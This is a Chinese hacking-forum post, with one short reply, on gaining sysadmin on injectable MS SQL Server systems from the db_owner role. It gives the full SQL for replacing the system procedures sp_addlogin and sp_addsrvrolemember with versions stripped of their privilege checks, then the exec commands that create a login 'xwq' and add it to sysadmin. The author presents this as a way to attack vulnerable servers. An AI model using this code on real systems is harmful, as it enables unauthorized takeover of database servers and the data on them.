db_owner角色下添加SYSADMIN帐号
<P><SPAN>知道大家看过这篇文章没有,可以在db_owner角色下添加SYSADMIN帐号,这招真狠啊,存在MSSQL注射漏洞的服务器又要遭殃了。方法主要是利用db_owner可以修改sp_addlogin和sp_addsrvrolemember这两个存储过程,饶过了验证部分。具体方法如下:先输入drop procedure sp_addlogin,然后在IE里面输入create procedure sp_addlogin <BR>@loginame sysname <BR>,@passwd sysname = Null <BR>,@defdb ; ; sysname = 'master' -- UNDONE: DEFAULT <BR>CONFIGURABLE??? <BR>,@deflanguage sysname = Null <BR>,@sid varbinary(16) = Null <BR>,@encryptopt varchar(20) = Null <BR>AS <BR>-- SETUP RUNTIME OPTIONS / DECLARE VARIABLES -- <BR>set nocount on <BR>Declare @ret int -- return value of sp call <BR><BR>-- DISALLOW USER TRANSACTION -- <BR>set implicit_transactions off <BR>IF (@@trancount 〉 0) <BR>begin <BR>raiserror(15002,-1,-1,'sp_addlogin') <BR>return (1) <BR>end <BR>-- VALIDATE LOGIN NAME AS: <BR>-- (1) Valid SQL Name (SQL LOGIN) <BR>-- (2) No backslash (NT users only) <BR>-- (3) Not a reserved login name <BR>execute @ret = sp_validname @loginame <BR>if (@ret 〈〉 0) <BR>return (1) <BR>if (charindex('\', @loginame) 〉 0) <BR>begin <BR>raiserror(15006,-1,-1,@loginame) <BR>return (1) <BR>end <BR>--Note: different case sa is allowed. <BR>if (@loginame = 'sa' or lower(@loginame) in ('public')) <BR>begin <BR>raiserror(15405, -1 ,-1, @loginame) <BR>return (1) <BR>end <BR>-- LOGIN NAME MUST NOT ALREADY EXIST -- <BR>if exists(select * from master.dbo.syslogins where loginname = <BR>@loginame) <BR>begin <BR>raiserror(15025,-1,-1,@loginame) <BR>return (1) <BR>end <BR>-- VALIDATE DEFAULT DATABASE -- <BR>IF db_id(@defdb) IS NULL <BR>begin <BR>raiserror(15010,-1,-1,@defdb) <BR>return (1) <BR>end <BR>-- VALIDATE DEFAULT LANGUAGE -- <BR>IF (@deflanguage IS NOT Null) <BR>begin <BR>Execute @ret = sp_validlang @deflanguage <BR>IF (@ret 〈〉 0) <BR>return (1) <BR>end <BR>ELSE <BR>begin <BR>select @deflanguage = name from master.dbo.syslanguages <BR>where langid = @@default_langid --server default <BR>language <BR>if @deflanguage is null <BR>select @deflanguage = N'us_english' <BR>end <BR>-- VALIDATE SID IF GIVEN -- <BR>if ((@sid IS NOT Null) and (datalength(@sid) 〈〉 16)) <BR>begin <BR>raiserror(15419,-1,-1) <BR>return (1) <BR>end <BR>else if @sid is null <BR>select @sid = newid() <BR>if (suser_sname(@sid) IS NOT Null) <BR>begin <BR>raiserror(15433,-1,-1) <BR>return (1) <BR>end <BR>-- VALIDATE AND USE ENCRYPTION OPTION -- <BR>declare @xstatus smallint <BR>select @xstatus = 2 -- access <BR>if @encryptopt is null <BR>select @passwd = pwdencrypt(@passwd) <BR>else if @encryptopt = 'skip_encryption_old' <BR>begin <BR>select @xstatus = @xstatus | 0x800, -- old-style <BR>encryption <BR>@passwd = convert(sysname, convert(varbinary <BR>(30), convert(varchar(30), @passwd))) <BR>end <BR>else if @encryptopt 〈〉 'skip_encryption' <BR>begin <BR>raiserror(15600,-1,-1,'sp_addlogin') <BR>return 1 <BR>end <BR>-- ATTEMPT THE insert OF THE NEW LOGIN -- <BR>insert INTO master.dbo.sysxlogins VALUES <BR>(NULL, @sid, @xstatus, getdate(), <BR>getdate(), @loginame, convert(varbinary(256), @passwd), <BR>db_id(@defdb), @deflanguage) <BR>if @@error 〈〉 0 -- this indicates we saw duplicate row <BR>return (1) <BR>-- update PROTECTION TIMESTAMP FOR MASTER DB, TO INDICATE <BR>SYSLOGINS CHANGE -- <BR>exec('use master grant all to null') <BR>-- FINALIZATION: RETURN SUCCESS/FAILURE -- <BR>raiserror(15298,-1,-1) <BR>return (0) -- sp_addlogin <BR>GO <BR>OK,我们新建个用户exec master..sp_addlogin xwq <BR><BR>再drop procedure sp_addsrvrolemember,然后在IE里输入 <BR><BR>create procedure sp_addsrvrolemember <BR>@loginame sysname, -- login name <BR>@rolename sysname = NULL -- server role name <BR>as <BR>-- SETUP RUNTIME OPTIONS / DECLARE VARIABLES -- <BR>set nocount on <BR>declare @ret int, -- return value of sp call <BR>@rolebit smallint, <BR>@ismem int <BR>-- DISALLOW USER TRANSACTION -- <BR>set implicit_transactions off <BR>IF (@@trancount 〉 0) <BR>begin <BR>raiserror(15002,-1,-1,'sp_addsrvrolemember') <BR>return (1) <BR>end <BR><BR>-- CANNOT CHANGE SA ROLES -- <BR>if @loginame = 'sa' <BR>begin <BR>raiserror(15405, -1 ,-1, @loginame) <BR>return (1) <BR>end <BR>-- OBTAIN THE BIT FOR THIS ROLE -- <BR>select @rolebit = CASE @rolename <BR>WHEN 'sysadmin' THEN 16 <BR>WHEN 'securityadmin' THEN 32 <BR>WHEN 'serveradmin' THEN 64 <BR>WHEN 'setupadmin' THEN 128 <BR>WHEN 'processadmin' THEN 256 <BR>WHEN 'diskadmin' THEN 512 <BR>WHEN 'dbcreator' THEN 1024 <BR>WHEN 'bulkadmin' THEN 4096 <BR>ELSE NULL END <BR>-- ADD ROW FOR NT LOGIN IF NEEDED -- <BR>if not exists(select * from master.dbo.syslogins where <BR>loginname = @loginame) <BR>begin <BR>execute @ret = sp_MSaddlogin_implicit_ntlogin @loginame <BR>if (@ret 〈〉 0) <BR>begin <BR>raiserror(15007,-1,-1,@loginame) <BR>return (1) <BR>end <BR>end <BR>-- update ROLE MEMBERSHIP -- <BR>update master.dbo.sysxlogins set xstatus = xstatus | @rolebit, <BR>xdate2 = getdate() <BR>where name = @loginame and srvid IS NULL <BR>-- update PROTECTION TIMESTAMP FOR MASTER DB, TO INDICATE <BR>SYSLOGINS CHANGE -- <BR>exec('use master grant all to null') <BR>raiserror(15488,-1,-1,@loginame,@rolename) <BR>-- FINALIZATION: RETURN SUCCESS/FAILURE <BR>return (@@error) -- sp_addsrvrolemember <BR>GO <BR><BR>接着再exec master..sp_addsrvrolemember xwq,sysadmin <BR>这样就建立了一个SA用户了,用SQL连接器连接上就OK了。很爽吧。不过在实践过程中发现用NB的SQL命令执行时会提示发送错误,可能是代码太长了的缘故,用IE又不方便,希望哪位能发个执行SQL语句的工具来方便大家。OK,到此结束。</SPAN></P>re:db_owner角色下添加SYSADMIN帐号
<P>这么多图片,辛苦楼主了,长见识了!</P>
页:
[1]